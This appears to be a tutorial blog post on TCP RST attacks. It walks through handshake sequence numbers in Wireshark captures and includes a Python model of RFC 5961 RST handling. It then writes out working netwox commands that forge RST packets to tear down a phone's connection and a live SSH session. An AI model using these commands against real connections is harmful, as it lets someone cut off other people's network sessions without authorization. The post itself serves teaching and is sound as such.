Preface
In TCP, there is a flag called the RST flag, which terminates the connection immediately. That is, if one party on the connection receives an RST packet sent by the other party, it will immediately close the connection.
Can a forged packet disconnect two devices?
According to the TCP specification, an RST packet is only acted on if it carries the sequence number the recipient expects. If the sequence number is not correct, the connection is not torn down.
Suppose A sends B a packet with sequence number 10 containing five bytes of data. A then expects an acknowledgement packet from B with the acknowledgement number 15 (10 + 5).
This requires knowledge of TCP’s three-way handshake process.
Three-way handshake analysis
The best way to understand this is to actually look at the TCP packets using the Wireshark tool.
Assume that the IP address of the PC is 192.168.43.157 and that of the mobile phone is 192.168.43.226.
The computer listens on port 7070, and the mobile phone initiates the connection. It begins with three packets, called the TCP three-way handshake, which exchange control information.
The first handshake packet is sent by the mobile phone, and the flag in the packet is SYN. This flag is set only on the first packet from each sender, and the packet also carries the sender's own SEQ number. When the other side replies, the ACK number of its packet is SEQ+1.
The second handshake packet is sent by the computer in response to the mobile phone. The flags in the packet are SYN, ACK, and the acknowledgement number is 1952416869, which tells the phone that its request has been received. The computer also has to tell the phone its own SEQ number so that the connection can be set up. The SEQ here is 1982386088.
The third packet is sent by the mobile phone in response to the computer, telling it that the phone can also receive its packets. The flag in the packet is ACK, the acknowledgement number is 1982386089, and the SEQ is 1952416869.
Both parties now hold each other's SEQ number, and each SEQ value has been incremented by 1.
Wireshark then captures four packets: the computer sends two bytes of data and receives an acknowledgement from the phone, and the phone sends two bytes of data and receives an acknowledgement from the computer.
The most important thing here is the SEQ change.
In the packet sent by the computer, SEQ is still its own sequence number, but the Next sequence number becomes its own SEQ plus the payload size. The ACK it expects to receive from the phone must equal that Next sequence number (1982386091).
Now look at how the phone responds.
The acknowledgement number is 1982386091, and nothing else has changed.
The phone then sends two bytes of data of its own, and the same process and the same verification apply.
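The sequence-number bookkeeping traced above can be replayed in a short model. This Python code is an added example, not code from the original article: it tracks the next sequence number a receiver expects and classifies an incoming RST the way RFC 5961 describes. The `Receiver` class, its method names and the 65535-byte window are assumptions made for illustration.

```python
MOD = 2 ** 32  # TCP sequence numbers are 32-bit and wrap around


class Receiver:
    """Hypothetical model: next sequence number expected from one peer (RCV.NXT)."""

    def __init__(self, window=65535):  # window size is an assumed value
        self.rcv_nxt = None
        self.window = window

    def on_segment(self, seq, payload_len=0, syn=False, fin=False):
        """Consume an in-order segment and return the ACK number to send back."""
        if syn:
            self.rcv_nxt = seq          # SYN announces the initial sequence number
        elif seq != self.rcv_nxt:
            return self.rcv_nxt         # not the expected segment: re-ACK as before
        # SYN and FIN each consume one sequence number, data one per byte
        self.rcv_nxt = (self.rcv_nxt + payload_len + syn + fin) % MOD
        return self.rcv_nxt

    def classify_rst(self, seq):
        """How an RST with this sequence number is handled under RFC 5961."""
        if seq == self.rcv_nxt:
            return "reset"              # exact match: the connection is closed
        if (seq - self.rcv_nxt) % MOD < self.window:
            return "challenge-ack"      # in window, not exact: peer must confirm
        return "drop"                   # outside the window: silently discarded


def replay_capture():
    """Replay the computer-to-phone segments from the capture described above."""
    phone = Receiver()
    acks = [
        phone.on_segment(1982386088, syn=True),       # SYN, ACK from the computer
        phone.on_segment(1982386089, payload_len=2),  # two bytes of data
    ]
    return phone, acks


if __name__ == "__main__":
    phone, acks = replay_capture()
    print("ACK numbers sent by the phone:", acks)
    for seq in (1982386091, 1982386088, 1982386091 + 1000):
        print(seq, "->", phone.classify_rst(seq))
```

Only an RST that carries the exact expected number closes the connection in this model; a stale number is dropped, and a near miss inside the window triggers a challenge ACK instead of a reset.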
Forging packets with netwox
Now let's forge a packet to demonstrate the RST attack.
This packet must contain the source address/port, the destination address/port, and most importantly, the SEQ number.
I looked for ways to send RST packets to clients, and found netwox to be a handy tool for forging packets. There is a good example of a TCP attack on page 32 of www.cse.iitm.ac.in/~chester/co…
The command is as follows.
netwox 40 -l <source IP address> -m <destination IP address> -o <listening port number> -p <client port number> -B -q <SEQ number>
In Wireshark, you can see that the port number of the client is 42560, and that the SEQ number has changed from the original 1982386088 to 1982386091.
netwox 40 -l 192.168.43.157 -m 192.168.43.226 -o 7070 -p 42560 -B -q 1982386091
When it is executed, you can see that a SocketException is thrown on Android.
Disconnecting SSH Connections
Now try to disconnect an SSH session that is already connected to a remote server.
tcp.port == 22 and tcp
netwox 40 -m 116.62.xx.xx -l 192.168.43.157 -o 22 -p 37156 -B -q 1328649361
Finally, the following output is displayed on the terminal:
root@meet:~# packet_write_wait: Connection to 116.62.xx.xx port 22: Broken pipe